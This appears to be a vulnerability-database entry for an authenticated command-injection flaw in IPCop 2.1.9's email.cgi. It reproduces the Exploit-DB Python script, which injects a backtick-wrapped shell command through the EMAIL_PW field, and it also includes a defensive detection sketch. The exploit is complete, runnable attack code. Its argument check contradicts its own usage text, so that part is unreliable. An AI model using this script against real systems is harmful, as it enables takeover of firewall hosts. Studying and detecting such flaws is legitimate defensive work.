Vendor: IPCop
By: Mücahit Saratar
CVSS: 9.8 (HIGH)
Type: Remote Code Execution (RCE)
CWE: 78
Product Name: IPCop
Affected Version From: 2.1.8
Affected Version To: 2.1.9
Patch Exists: YES
Related CWE: N/A
CPE: a:ipcop:ipcop
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Parrot OS 5.7.0-2parrot2-amd64
2021

IPCop 2.1.9 – Remote Code Execution (RCE) (Authenticated)

This exploit allows an authenticated user to execute arbitrary code on an IPCop 2.1.9 system. It works by sending a malicious POST request to the email.cgi script (cgi-bin/email.cgi), which is used to configure the email settings. The payload is sent in the EMAIL_PW parameter, wrapped in backticks, and is then executed by the system (OS command injection, CWE-78). The script below posts the form twice: once with the save action and once with the send-test-mail action. The attacker must have valid credentials for the system.

Mitigation:

The best way to mitigate this vulnerability is to keep the system up to date with the latest security patches and to ensure that all users have strong passwords, since the exploit only works with valid credentials.
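
A detection sketch for the request described above, added here as an example (it is not part of the Exploit-DB entry or of IPCop's code): it decodes POST bodies sent to email.cgi and flags email form fields whose values contain shell metacharacters. The record layout, the sample requests and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Characters that let a form value reach shell execution: command
# substitution (backticks, "$(") and command separators.
SHELL_META = re.compile(r"[`;&|]|\$\(")

# Form fields posted to email.cgi, as named on this page.
EMAIL_FIELDS = ("EMAIL_SERVER", "EMAIL_USR", "EMAIL_PW", "EMAIL_FROM", "EMAIL_TO")

def suspicious_fields(path, body):
    """Return sorted names of email.cgi fields whose decoded value
    contains shell metacharacters; empty list for any other path."""
    if not path.split("?", 1)[0].endswith("/cgi-bin/email.cgi"):
        return []
    form = parse_qs(body, keep_blank_values=True)
    hits = set()
    for name in EMAIL_FIELDS:
        for value in form.get(name, []):
            if SHELL_META.search(value):
                hits.add(name)
    return sorted(hits)

# Constructed sample records (method, path, url-encoded body); not real traffic.
SAMPLE_REQUESTS = [
    ("POST", "/cgi-bin/email.cgi",
     "EMAIL_SERVER=mail.example.org&EMAIL_USR=ipcop%40localdomain"
     "&EMAIL_PW=S3cret-pass&ACTION=Save"),
    ("POST", "/cgi-bin/email.cgi",
     "EMAIL_SERVER=mail.example.org&EMAIL_USR=ipcop%40localdomain"
     "&EMAIL_PW=%60id%60&ACTION=Save"),
    ("POST", "/cgi-bin/other.cgi", "EMAIL_PW=%60id%60"),
]

def scan(requests):
    """Return (index, fields) for every POST that trips the check."""
    alerts = []
    for i, (method, path, body) in enumerate(requests):
        if method != "POST":
            continue
        fields = suspicious_fields(path, body)
        if fields:
            alerts.append((i, fields))
    return alerts

if __name__ == "__main__":
    for index, fields in scan(SAMPLE_REQUESTS):
        print(f"request {index}: shell metacharacters in {', '.join(fields)}")
```

A legitimate password can contain `;`, `&` or `|`, so treat a hit as a triage signal to correlate with the authenticated user and source address rather than as proof of exploitation.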

Exploit-DB raw data:

# Exploit Title: IPCop 2.1.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/08/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipcop.org/
# Software Link: https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.8/ipcop-2.1.8-install-cd.i486.iso - https://sourceforge.net/projects/ipcop/files/IPCop/IPCop%202.1.9/ipcop-2.1.9-update.i486.tgz.gpg
# Version: 2.1.9
# Tested on: parrot os 5.7.0-2parrot2-amd64

#!/usr/bin/python3

import requests as R
import os
import sys
import base64
import urllib3

R.packages.urllib3.disable_warnings()
R.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
    R.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
    # no pyopenssl support used / needed / available
    pass

try:
    hostport = sys.argv[1]
    assert hostport[:8] == "https://" and hostport[-1] == "/"
    url = hostport + "cgi-bin/email.cgi"
    username = sys.argv[2].encode()
    password = sys.argv[3].encode()
    auth = base64.b64encode(username+b":"+password).decode()
    command = sys.argv[4]
    assert " " in command
except:
    print("[-] Usage https://host:port/ username password command(no spaces) <port for listen with nc - optional - >")
    exit(1)


rheader = {"Authorization":"Basic "+auth,
        "Origin": hostport,
        "Referer": url}

rdata = {
        "EMAIL_SERVER": "mucahitsaratar.github.io",
        "EMAIL_USE_TLS": "auto",
        "EMAIL_SERVER_PORT": "1337",
        "EMAIL_USR": "ipcop@localdomain",
        "EMAIL_PW": f"`{command}`",
        "EMAIL_FROM": "ipcop@localdomainn",
        "EMAIL_TO": "ipcop@localdomainnn",
        "ACTION": "Kaydet" # change here to what is mean the "save && send test mail" in target language
        }


R.post(url,headers=rheader, data=rdata, verify=False)
rdata["ACTION"] = "Test postası gönder" # send test mail
R.post(url,headers=rheader, data=rdata, verify=False)